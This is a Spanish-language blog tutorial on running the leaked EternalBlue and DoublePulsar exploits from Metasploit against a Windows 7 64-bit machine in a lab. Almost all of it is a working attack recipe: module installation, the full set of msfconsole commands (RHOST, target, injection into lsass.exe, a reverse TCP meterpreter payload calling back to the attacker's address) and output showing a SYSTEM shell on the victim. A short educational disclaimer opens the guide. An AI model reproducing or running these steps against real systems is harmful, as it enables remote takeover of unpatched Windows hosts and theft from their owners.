Hackeando Windows 7 de 64 bits con EternalBlue y DoublePulsar todo desde Metasploit

Esta es una guía de como integrar EternalBlue + DoublePulsar exploits de la NSA a Metasploit. Hace algunos días se publicaba la noticia que el grupo ShadowBrokers había liberado una segunda publicación de exploits de la NSA, disponibles en el GitHub.

A pesar que el framework FuzzBunch contenía una suite de exploits, lo que más llamo la atención a la comunidad de seguridad fueron los exploits llamados EternalBlue y DoublePulsar que sirven para atacar todas las versiones de windows al protocolo SMB y RDP.

Eternalblue se encarga de crear un backdoor y Doublepulsar de inyectar una dll en el proceso del sistema que nosotros queramos, ya que en una de las opciones nos pregunta en que proceso del sistema queremos inyectar la dll.

El framework FuzzBunch es parecido a metasploit, pero corre bajo windows, y como todos saben el 99% de los auditores de seguridad, pentester, researchers del mundillo de la seguridad usamos gnu/linux.

Gracias a dos investigadores Sheila Berta (Argentina) y Pablo Gonzalez (Español) ambos trabajadores de ElevenPaths podemos disfrutar de integrar EternalBlue y DoublePulsar a nuestro querido Metasploit.

Shiela Berta
http://www.twitter.com/UnaPibaGeek
http://www.semecayounexploit.com

Pablo Gonzalez
http://www.twitter.com/pablogonzalezpe

Esta guía se entrega con fines educativos para quienes estudian temas de ciberseguridad, no utilices este conocimiento con fines ilegales. No me hago responsable de lo que tu puedas hacer con este conocimiento.

Paso 1 – Elementos necesarios

  • Kali linux 32bits > IP 192.168.1.117 > ATACANTE
  • Windows 7 64bits > IP 192.168.1.101 > VICTIMA

1. Lo primero que vamos hacer será abrir nuestro kali linux.

2. Descargar del GitHub el archivo zip y luego descomprimirlo.

3. Copiar el archivo eternalblue_doublepulsar.rb a la siguiente dirección:
/usr/share/metasploit-framework/modules/exploits/windows/smb/

4. Crear la estructura de carpetas y copiar el contenido de la carpeta deps a /root/shadowbroker/windows/lib/x86-Windows/

5. Abrir una terminal y tipear el comando winecfg para que se cree la carpeta /root/.wine/drive_c/

6. Abrir una terminal y iniciar metasploit con el comando msfconsole

Paso 2 – Para llamar al exploit tipear use exploit/windows/smb/eternalblue_doublepulsar.

msf > use exploit/windows/smb/eternalblue_doublepulsar

Si quieres ver las opciones tipear show options

msf exploit(eternalblue_doublepulsar) > show options

Paso 3 – Setear el remote host, tipear set RHOST ip-victima

msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.101
rhost => 192.168.1.101

Paso 4 – Si quieres ver los targets disponibles tipear show targets

msf exploit(eternalblue_doublepulsar) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic
1 Windows XP (all services pack) (x86) (x64)
2 Windows Server 2003 SP0 (x86)
3 Windows Server 2003 SP1/SP2 (x86)
4 Windows Server 2003 (x64)
5 Windows Vista (x86)
6 Windows Vista (x64)
7 Windows Server 2008 (x86)
8 Windows Server 2008 R2 (x86) (x64)
9 Windows 7 (all services pack) (x86) (x64) 

Paso 5 – Setear el SO target con set target (nro id)

msf exploit(eternalblue_doublepulsar) > set target 9

Paso 6 – Setear la arquitectura del sistema a atacar, tipear set TARGETARCHITECTURE x64

msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
targetarchitecture => x64

Paso 7 – Setear el proceso en el cual se desea injectar la DLL tipear set PROCESSINJECT lsass.exe

msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe
processinject => lsass.exe

Paso 8 – Setear el payload de 64bits para que se devuela un meterpreter reverso, tipear set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Para ver las opciones tipear show options

msf exploit(eternalblue_doublepulsar) > show options

Para ver los payloads disponibles tipear show payloads

msf exploit(eternalblue_doublepulsar) > show PAYLOADS

Paso 9 – Setear la máquina atacante set LHOST ip-atacante

msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.117
lhost => 192.168.1.117

Paso 10 – Para explotar el fallo de seguridad tipear exploit, si todo salio bien recibirá una sesión de meterpreter, si tipeamos sysinfo veremos la información del equipo vulnerado.

 
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.1.117:4444
[*] 192.168.1.101:445 - Generating Eternalblue XML data
[*] 192.168.1.101:445 - Generating Doublepulsar XML data
[*] 192.168.1.101:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.101:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.101:445 - Launching Eternalblue...
[+] 192.168.1.101:445 - Pwned! Eternalblue success!
[*] 192.168.1.101:445 - Launching Doublepulsar...
[*] Sending stage (1189423 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.117:4444 -> 192.168.1.101:49158) at 2017-04-26 00:36:16 -0400
[+] 192.168.1.101:445 - Remote code executed... 3... 2... 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer : WIN7X64
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : es_AR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >

Cualquier duda puedes enviarme un email.

Autor:
Eduardo Natali
email: contacto@rootsolutions.com.ar
Twitter: https://twitter.com/enatali_
web: https://www.rootsolutions.com.ar